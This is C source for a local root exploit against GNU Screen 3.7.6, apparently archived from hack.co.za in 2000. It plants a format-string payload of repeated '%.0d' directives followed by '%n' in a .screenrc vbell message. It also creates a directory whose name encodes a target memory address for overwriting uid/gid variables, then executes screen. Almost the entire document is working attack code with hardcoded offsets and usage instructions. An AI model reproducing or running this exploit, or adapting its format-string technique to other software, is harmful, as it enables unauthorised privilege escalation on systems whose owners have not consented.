Screen 3.7.6 (and others) local root exploit.
62f1c82f1876f11bcc563d044cc998f0f0b3ce2061a32bad1588595b8a773e53
/****************************************************************
* *
* Screen 3.7.6 (and others) local exploit *
* by IhaQueR@IRCnet *
* *
****************************************************************/
#include <stdio.h>
#include <sys/stat.h>
#include <sys/types.h>
#include <fcntl.h>
#include <unistd.h>
#include <string.h>
#define TMPBUFSIZE 4096
#define SCREENRC "/usr/home/paul/.screenrc"
#define SCREEN "/usr/bin/screen"
#define AREP 1
#define BUFOFFSET 324
#define PADDING 3
#define WRITEADDR 0x807beb4
// some offsets grabbed from 3.7.6
// &real_uid, &real_gid, &eff_uid, &eff_gid own_uid
// 0x807beb4 0x807ab1c 0x807aab0 0x807aab4 0x807bea4
// + 64 +64
int main(int argc, char** argv)
{
int i, l;
FILE* fp;
char buf[TMPBUFSIZE];
unsigned char adr[(AREP+2)*sizeof(unsigned)];
unsigned char* cp;
unsigned a, *p;
if(argc != 2) {
printf("USAGE %s offset\n", argv[0]);
return 0;
}
l = atoi(argv[1]);
printf("creating magic string\n");
bzero(buf, TMPBUFSIZE);
/* consume stack arguments */
for(i=0; i<BUFOFFSET/4; i++)
strcat(buf, "%.0d");
/* finally write to adress */
// for(i=0;i<9; i++)
strcat(buf, "%n");
if(fp = fopen(SCREENRC, "w")) {
fprintf(fp, "vbell on\n");
fprintf(fp, "vbell_msg '%s'\n", buf);
fprintf(fp, "vbellwait 11111\n");
fclose(fp);
}
else {
printf("ERROR: opening %s\n", SCREENRC);
}
/* now create the magic dir... */
bzero(adr, (AREP+2)*sizeof(unsigned));
cp = adr;
for(i=0; i<PADDING; i++) {
*cp = 'p';
cp++;
}
p = (unsigned*) cp;
a = WRITEADDR;
a = a + l;
for(i=0; i<AREP; i++) {
*p = a;
// a += 4;
p++;
}
*p = 0;
/* make dir and call screen */
mkdir((char*)adr, 0x777);
chdir((char*)adr);
argv[1] = NULL;
execv(SCREEN, argv);
}
/* www.hack.co.za [11 September 2000]*/